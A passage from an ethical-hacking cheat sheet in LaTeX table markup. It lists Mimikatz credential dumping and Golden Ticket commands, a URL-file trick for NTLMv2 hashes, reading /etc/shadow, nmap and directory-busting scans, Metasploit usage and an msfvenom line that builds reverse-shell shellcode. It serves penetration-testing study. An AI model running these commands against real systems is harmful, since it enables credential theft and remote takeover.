px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}gpp-decrypt {\bf{\$cPassword}}`} \tn % Row Count 2 (+ 2) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Performing a URL File Attack to get more NTLMv2 hashes} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}create a file: `\{\{lang-plaintext\}\}@somefile.url` \textgreater{}\textgreater{} in created file, put:\{\{nl\}\} `\{\{lang-plaintext\}\}{[}InternetShortcut{]}\{\{nl\}\}URL=someurl`} \tn % Row Count 7 (+ 5) % Row 17 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Performing the Print Nightmare Attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}\{\{popup="https://www.notion.so/PrintNightmare-CVE-2021-1675-71b727dba3ec4b92b1111624f2345337?pvs=4"\}\}External Link\{\{/popup\}\}} \tn % Row Count 11 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks -{}- Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{First things first} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}privilege::debug`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Dump hashes of currently logged on users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}sekurlsa::logonpasswords`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Dump SAM hashes} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}lsadump::lsa /patch`} \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Dump SAM hash of a specific account} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}lsadump::lsa /inject /name:krbtgt`} \tn % Row Count 9 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Golden Ticket Attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}kerberos::golden /user:{\bf{someuser}} /domain:GOLD.local\{\{\ \}\}/sid:{\bf{domainsid}} /id:500 /krbtgt:{\bf{NThash}}/ptt`} \tn % Row Count 13 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Useful Linux Commands}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To locate a file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`updatedb\{\{nl\}\}locate FILE`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To clone a github repo} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`git clone REPO\_URL`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For {\bf{command2}} to execute if and only if {\bf{command1}} execs successfully} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`COMMAND1 \&\& COMMAND2`} \tn % Row Count 7 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{For {\bf{command2}} to execute if and only if {\bf{command1}} fails to exec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`COMMAND1 || COMMAND2`} \tn % Row Count 10 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Print a range of numbers from {\bf{start}} to {\bf{stop}} with {\bf{step}} increment} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`seq {[}START\_NO{]} {[}STEP{]} STOP\_NO`\{\{nl\}\}`seq 1 256`} \tn % Row Count 14 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To split a string into fields based on a delimiter (e.g space), and select the Nth field. Include {\bf{file}} if string is in a file and not stdin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`"string to cut into six fields" | cut -d ' ' -f N` {[}FILE{]}} \tn % Row Count 19 (+ 5) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list open ports on a system} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}netstat -lp} \tn % Row Count 21 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To kill a process on an open port (thus closing the port)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}kill {\bf{pid\_no}}} \tn % Row Count 24 (+ 3) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To zip a file/directory (-r for recursiveness)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}zip -r zippedfile.zip file-or-dir-to-zip`} \tn % Row Count 27 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To unzip a zipped file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`unzip zippedfile.zip`} \tn % Row Count 29 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list crontab for a user} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`crontab -u johndoe -l`} \tn % Row Count 31 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Useful Linux Commands (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To create a cronjob to echo "nice" into a file every minute (more on cronjobs \{\{link="https://crontab.guru"\}\}here\{\{/link\}\}`:} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`crontab -e` -{}-\textgreater{} `*/1 * * * * echo "nice" \textgreater{}\textgreater{} file.txt`} \tn % Row Count 5 (+ 5) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To find a {\emph{file}} in directory / with permission of {\emph{4000}} (} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}find / -type f -perm -4000`} \tn % Row Count 8 (+ 3) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To set SUID bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod u+s` or `\{\{lang-plain\}\}chmod 4000`} \tn % Row Count 11 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To set SGID bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod g+s` or `\{\{lang-plain\}\}chmod 2000`} \tn % Row Count 14 (+ 3) % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To set sticky bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod +t` or `\{\{lang-plain\}\}chmod 1000`} \tn % Row Count 17 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Network Commands}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get IP info of network interfaces} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip a`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get arp neighbors} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip n` \{\{nl\}\} `arp -a`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get info on gateway} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip r`} \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Users and Privileges}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To switch between users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`su USERNAME`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To run a {\bf{command}} as {\bf{user}} without explicitly switching users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`su USERNAME -c "COMMAND"`} \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list sudo permissions for a user in terminal scope} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo -l`} \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To elevate priv of a user in terminal scope into super user} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo su`} \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For persistent super user / root mode} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo -s`} \tn % Row Count 13 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To change passwd for a {\bf{user}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`passwd USERNAME`} \tn % Row Count 15 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To add a new {\bf{user account}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`adduser USERNAME`} \tn % Row Count 17 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To view all user accounts, passwd or shadow file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/passwd \{\{nl\}\}cat /etc/shadow`} \tn % Row Count 19 (+ 2) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To view all groups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/group`} \tn % Row Count 21 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To view sudo users (sudoers)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/sudoers`} \tn % Row Count 23 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Linux Services}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To start, stop or restart a service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`service SERVICE\_NAME start` \{\{nl\}\}`service SERVICE\_NAME stop` \{\{nl\}\} `service SERVICE\_NAME restart`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To check status of a service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`service SERVICE\_NAME status`} \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.09034 cm} x{2.88666 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Stages of Ethical Hacking}} \tn % Row 0 \SetRowColor{LightBackground} information gathering & using tools like wapalyzer, builtwith, breachparse, \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} scanning and enumeration & using tools like nmap, dirb, nikto, nessus, sublist3r, amass, \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} gaining access (exploitation) & using tools like searchsploit, exploit-db, metasploit, buffer overflows, bind/reverse shells \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} \seqsplit{post-exploitation} & using tools like pspy64, linpeas.sh, winpeas.sh or by doing a hashdump, \seqsplit{passwd/shadow/group/sudoers} file dumps, etc \tn % Row Count 15 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Scanning and Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Port/Service Scanning/Discovery}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{enumerate all devices discoverable on a subnet} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`netdiscover -r 10.10.10.0/24`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{nmap TCP half-open scan on all ports with OS/version detection, script scan, tracert} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sS -p- -A 10.10.10.10`} \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{nmap scan on range of IPs with only ping scan (port scan disabled)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sn 10.10.10-124.0-255`} \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{nmap TCP half-open scan for select ports while skipping host discovery} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sS -p1-1024 -A -Pn 10.10.10.0-255`} \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{-sT (for full TCP 3-way handshake scan)\{\{nl\}\}-sU (for UDP scan)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}other scan techniques in place of -sS} \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Nessus scan} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}service nessusd start` -{}-\textgreater{} `\{\{lang-plain\}\}https://kali:8834`} \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Nikto scan} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nikto -host http://10.10.10.10`} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{HTTP/S Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Website vuln scan with Nikto} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nikto -host http://10.10.10.10`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{standard directory busting with dirb using default common.txt wordlist. -w ignores warnings. use -r for no recursive search.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`dirb https://securesite.com -w`} \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Directory busting with dirb specifying wordlists and extensions to append to words probe} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`dirb http://unsecuresite.com /path/to/wordlist -X .html,.php -w} \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{standard directory busting with gobuster} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gobuster dir -u https://somesite.com -w /path/to/word/list`} \tn % Row Count 13 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{directory busting with gobuster, specify {\bf{threads}} and file extensions to append to words} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gobuster dir -u http://somesite.com -w /path/to/word/list -x .html,.php`} \tn % Row Count 17 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Enumeration of tech stack for a website} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}whatweb https://www.example.com} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Some wordlists to use:\{\{nl\}\} `/usr/share/wordlists/dirbuster/{[}directory-list-2.3-medium.txt`\{\{nl\}\}`/usr/.../dirbuster/directory-list-lowercase-2.3-medium.txt` \newline Other useful options for dirbusting with gobuster include: -c (to specify cookies string), -a (to set user agent).} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Domain Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Sub-domain enumeration} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sublist3r -d DOMAIN.COM`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{discover domain names hosted on a server via virtual hosting} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}dns -n SERVER\_IP -r \seqsplit{LOCAL\_IP\_RANGE\_TO\_SEARCH\_FOR\_DOMAINS} \{\{nb\}\} dnsrecon -n 10.10.10.11 -r 127.0.0.0/24} \tn % Row Count 7 (+ 5) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{to add discovered domain to host file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}edit /etc/hosts and add mapping: `SERVER\_IP DOMAINNAME.COM`} \tn % Row Count 10 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To probe domains for http/s servers using tomnomnom's httprobe} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat domain-names.txt | httprobe`} \tn % Row Count 13 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{SMB Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{connect to SMB and list share names} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}smbclient -L \textbackslash{}\textbackslash{}\textbackslash{}\textbackslash{}192.168.219.133`} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{connect to an SMB share} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}smbclient \textbackslash{}\textbackslash{}\textbackslash{}\textbackslash{}192.168.219.133\textbackslash{}\textbackslash{}SHARENAME\$`} \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Enumerate SMB with help from modules from metasploit {\emph{auxiliary}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}search smb auxiliary} \tn % Row Count 9 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{SSH Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{connecting to SSH on legacy systems. First start with `ssh login@serverip` and continue incrementally if needed} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}ssh username@10.10.10.10 \seqsplit{-oKexAlgorithms=+diffie-hellman-group-exchange-sha1} \seqsplit{-oHostKeyAlgorithms=+ssh-rsa} -c aes128-cbc} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To connect using private key.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}ssh -i id.rsa johndoe@10.0.0.1`} \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{NFS Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To mount the network file system on local machine} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}mount 10.0.0.1:/srv/nfs /mnt`} \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{EXPLOITATION}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Start metasploit. {[}Starting metasploit first time?{]}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfconsole`. `\{\{lang-plain\}\}{[}msfdb init \&\& msfconsole{]}`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To search for an {\bf{exploit}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}search {\bf{EXPLOIT\_NAME}}`} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{After search, to select an exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}use {\bf{exploitdb\_id}}`} \tn % Row Count 8 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To see options for an exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}options`} \tn % Row Count 10 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To set a value for an option} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}set {\bf{option\_name}} {\bf{value}}`} \tn % Row Count 12 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To run exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}run` or `\{\{lang-plain\}\}exploit`} \tn % Row Count 14 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Automate metasploit with recourse scripts (`.rc` files)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfconsole -r FILE\_NAME.rc`} \tn % Row Count 17 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get list of all metasploit payloads via msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -{}-list payloads`} \tn % Row Count 20 (+ 3) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the list of all options per payload} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p {\bf{payload\_name}} -{}-list-options`} \tn % Row Count 23 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get list of payload file output formats support by msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -{}-list formats`} \tn % Row Count 26 (+ 3) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Basic syntax for using msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p {\bf{payload\_name}} {\bf{OPTION1=VALUE1}} {\bf{OPTION2=VALUE2}} -a {\bf{sys\_arch}} \{\{nl\}\}-f {\bf{out\_file\_format}} -o {\bf{out\_file\_name}}`} \tn % Row Count 31 (+ 5) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Create reverse\_shell shellcode (e.g. for buffer overflow exploit)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=2222 \{\{nl\}\}EXITFUNC=thread -b "\textbackslash{}x00" -a x86 -f c`} \tn % Row Count 